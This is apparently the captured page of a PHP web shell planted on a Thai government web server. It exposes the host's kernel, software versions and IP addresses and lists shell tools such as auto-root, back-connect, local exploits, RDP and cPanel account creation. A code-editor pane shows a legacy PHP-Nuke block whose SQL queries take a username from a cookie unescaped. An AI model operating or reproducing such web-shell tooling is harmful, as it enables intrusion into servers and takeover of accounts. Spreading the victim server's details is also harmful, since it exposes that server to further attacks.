Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
blocks /
[ HOME SHELL ]
Name
Size
Permission
Action
block-Who-is-Where.php
4.77
KB
-rw-r--r--
block-Who_is_Online.php
2.83
KB
-rw-r--r--
block-car-today.php
3.16
KB
-rw-r--r--
block-happybirthday.php
1.19
KB
-rw-r--r--
block-meeting-today.php
3.66
KB
-rw-r--r--
block-permission-today.php
5.44
KB
-rw-r--r--
block-person.php
14.11
KB
-rw-r--r--
block-work-today.php
10.63
KB
-rw-r--r--
countdown.php
5.22
KB
-rw-r--r--
index.html
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block-Who_is_Online.php
<?php /************************************************************************/ /* PHP-NUKE: Web Portal System */ /* =========================== */ /* */ /* Copyright (c) 2006 by Francisco Burzi */ /* http://phpnuke.org */ /* */ /* This program is free software. You can redistribute it and/or modify */ /* it under the terms of the GNU General Public License as published by */ /* the Free Software Foundation; either version 2 of the License. */ /************************************************************************/ if ( !defined('BLOCK_FILE') ) { Header("Location: ../index.php"); die(); } global $user, $cookie, $prefix, $db, $user_prefix; cookiedecode($user); if (isset($_SERVER['REMOTE_ADDR'])) { $ip = $_SERVER['REMOTE_ADDR']; } if (is_user($user)) { $uname = $cookie[1]; $guest = 0; } else { if (!empty($ip)) { $uname = $ip; } else { $uname = ""; } $guest = 1; } $guest_online_num = $db->sql_numrows($db->sql_query("SELECT * FROM ".$prefix."_session WHERE guest='1'")); $member_online_num = $db->sql_numrows($db->sql_query("SELECT * FROM ".$prefix."_session WHERE guest='0'")); $who_online_num = $guest_online_num + $member_online_num; $who_online = "<div align=\"center\"><span class=\"content\">"._CURRENTLY." $guest_online_num "._GUESTS." $member_online_num "._MEMBERS."<br>"; $content = "$who_online"; if (is_user($user)) { if (is_active("Private_Messages")) { $row = $db->sql_fetchrow($db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$uname'")); $uid = intval($row['user_id']); $newpm = $db->sql_numrows($db->sql_query("SELECT * FROM ".$prefix."_bbprivmsgs WHERE privmsgs_to_userid='$uid' AND (privmsgs_type='5' OR privmsgs_type='1')")); } } $row2 = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_blocks WHERE bkey='online'")); $title = filter($row2['title'], "nohtml"); if (is_user($user)) { $content .= "<br>"._YOUARELOGGED." <b>$uname</b>.<br>"; if (is_active("Private_Messages")) { $row3 = $db->sql_fetchrow($db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$uname'")); $uid = intval($row3['user_id']); $numrow = $db->sql_numrows($db->sql_query("SELECT privmsgs_to_userid FROM ".$prefix."_bbprivmsgs WHERE privmsgs_to_userid='$uid' AND (privmsgs_type='1' OR privmsgs_type='5' OR privmsgs_type='0')")); $content .= ""._YOUHAVE." <a href=\"modules.php?name=Private_Messages\"><b>$numrow</b></a> "._PRIVATEMSG.""; } $content .= "</span></div>"; } else { $content .= "<br>"._YOUAREANON."</span></div>"; } ?>
Close